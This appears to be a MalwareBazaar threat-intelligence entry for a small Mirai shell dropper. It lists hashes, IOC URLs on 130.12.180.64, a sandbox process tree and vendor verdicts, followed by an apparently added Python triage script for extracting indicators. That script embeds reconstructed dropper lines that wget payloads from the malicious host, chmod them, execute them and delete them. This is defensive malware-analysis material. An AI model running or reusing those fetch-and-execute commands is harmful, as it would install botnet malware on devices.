MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 18849487f938b1c9d15ff3223167f7828a9dd8ad2e2cab629e4bd43ec54e6e2c. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Mirai


Vendor detections: 6



SHA256 hash: 18849487f938b1c9d15ff3223167f7828a9dd8ad2e2cab629e4bd43ec54e6e2c
SHA3-384 hash: 420507cfbe40b5f14cf310138771e574a3a11ea0aed9f3cadee7663962b4da89bdebedb45722727e02e051b50c1046a1
SHA1 hash: 3711d03f1bf7bdbbf3a22dffe9bd605bf09a1e71
MD5 hash: a6183e78fefa0de1895755904a216cf7
humanhash: early-london-oven-winner
File name: zb
Signature: Mirai
File size: 202 bytes
First seen: 2025-12-21 15:14:17 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep: 3:LxAjdVZPWwVxAjdVZUaSdXJa3B0dEJvKsjFTNjEF4FT2JFE7AwFqDjKaJo4jKLJv:L6PWi6Uaka3BZhKYzEOELE7AwRkoLhn
TLSH: T167D0124A300909C15D88BAE43F57307135809706D4A61A2F9DB381F3C993905F30CD28
Magika: shell
Reporter: abuse_ch
Tags: sh

IOCs (columns: URL / Malware sample (SHA256 hash) / Signature / Tags)

URL: http://130.12.180.64/mipst
Malware sample (SHA256 hash): n/a
Signature: n/a
Tags: elf ua-wget

URL: http://130.12.180.64/mpsl
Malware sample (SHA256 hash): c3368dbe8c72d6b562974c6aa1c5a3642e0f47ebc4d79888824c8d71b5fcabfa
Signature: Mirai
Tags: elf mirai ua-wget

Intelligence

File Origin
# of uploads: 1
# of downloads: 38
Origin country: DE

Vendor Threat Intelligence
No detections
Verdict: Malicious
File Type: text
First seen: 2025-12-21T12:37:00Z UTC
Last seen: 2025-12-22T15:02:00Z UTC
Hits: ~10
Status: terminated
Behavior Graph (process tree recovered from the graph data; pids as reported by the sandbox):
/usr/bin/sudo (pid 2957)
  execve -> /tmp/sample.bin (pid 2959)
    execve -> /usr/bin/wget (pid 2961) [net, send-data]; sends 133 B to 130.12.180.64:80
    execve -> /usr/bin/wget (pid 2968) [net, send-data, write-file]; sends 132 B to 130.12.180.64:80
    execve -> /usr/bin/chmod (pid 2983)
    execve -> /usr/bin/chmod (pid 2985)
    execve -> /usr/bin/dash (pid 2987)
    execve -> /usr/bin/dash (pid 2988)
    execve -> /usr/bin/rm (pid 2989)
    execve -> /usr/bin/rm (pid 2992) [delete-file]
Threat name: Script-Shell.Downloader.Heuristic
Status: Malicious
First seen: 2025-12-21 15:35:22 UTC
File Type: Text (Shell)
AV detection: 2 of 24 (8.33%)
Threat level: 2/5
Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
(The three behaviour tags above name Windows-only mechanisms, the registry and the SetWindowsHookEx API, which a POSIX shell script cannot invoke directly; treat them as a sandbox reporting artefact rather than as observed behaviour of this sample. The wget, chmod, dash and rm chain against 130.12.180.64 in the behaviour graph above is what supports the downloader classification.)
Please note that we are no longer able to provide a coverage score for Virus Total.
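The IOC table and the behaviour graph above together describe the classic Mirai staging chain: a shell script that fetches one payload per target architecture from 130.12.180.64 with wget, marks it executable with chmod, runs it, and removes it. The following is an added example, not MalwareBazaar's code and not the 202-byte sample itself: a small triage script that pulls the download URLs, hosts and payload names out of such a dropper and reports whether the fetch, chmod, execute and cleanup stages are all present. The script text it runs on is constructed to mirror the process tree shown above (the two URLs are the ones from the IOC table; the file layout and the `cd` fallback line are assumptions, since the real file contents are not on this page).

```python
import re
from urllib.parse import urlparse

# Constructed stand-in for the dropper, modelled on the behaviour graph above
# (two wget fetches from 130.12.180.64, chmod, execute via the shell, rm).
# This is NOT the 202-byte sample; only the URLs are taken from the IOC table.
SAMPLE_SCRIPT = """\
cd /tmp || cd /var/run || cd /dev/shm
wget http://130.12.180.64/mipst -O mipst; chmod +x mipst; ./mipst; rm -rf mipst
wget http://130.12.180.64/mpsl -O mpsl; chmod +x mpsl; ./mpsl; rm -rf mpsl
"""

# An http(s) URL up to the next whitespace or shell separator.
URL_RE = re.compile(r"https?://[^\s;|&<>']+", re.IGNORECASE)
# Fetch tools seen in IoT droppers; \b lets "/usr/bin/wget" and "busybox wget" match too.
FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
CHMOD_RE = re.compile(r"\bchmod\b")
RM_RE = re.compile(r"\brm\b")


def extract_iocs(script: str) -> dict:
    """Pull network and staging indicators out of a shell dropper's text."""
    urls: list[str] = []
    for match in URL_RE.finditer(script):
        url = match.group(0).rstrip(".,)")
        if url not in urls:  # keep first-seen order, drop duplicates
            urls.append(url)

    hosts = sorted({h for h in (urlparse(u).hostname for u in urls) if h})
    # The last path component is the name the dropper normally saves the payload under.
    payload_names = [n for n in (urlparse(u).path.rsplit("/", 1)[-1] for u in urls) if n]

    return {
        "urls": urls,
        "hosts": hosts,
        "payload_names": payload_names,
        "fetches": FETCH_RE.search(script) is not None,
        "chmod": CHMOD_RE.search(script) is not None,
        # "./<name>" for a fetched name is the execute stage of the chain.
        "executes": any(f"./{n}" in script for n in payload_names),
        "cleanup": RM_RE.search(script) is not None,
    }


def classify(iocs: dict) -> str:
    """Coarse verdict: fetch + URL + execute is the downloader pattern."""
    if iocs["fetches"] and iocs["urls"] and iocs["executes"]:
        return "downloader"
    if iocs["urls"]:
        return "references-url"
    return "no-download-indicators"


if __name__ == "__main__":
    result = extract_iocs(SAMPLE_SCRIPT)
    for key, value in result.items():
        print(f"{key}: {value}")
    print("verdict:", classify(result))
```

The extracted hosts and payload names are what you would feed into a blocklist or a hunt across proxy and DNS logs; the stage flags are the same signal the "Script-Shell.Downloader.Heuristic" name above encodes, and they stay true even when the payload host changes, which is why the verdict is keyed on the chain rather than on the IP.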

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download
Signature: Mirai
File type: sh
SHA256 hash: 18849487f938b1c9d15ff3223167f7828a9dd8ad2e2cab629e4bd43ec54e6e2c (this sample)

Delivery method: Distributed via web download

Comments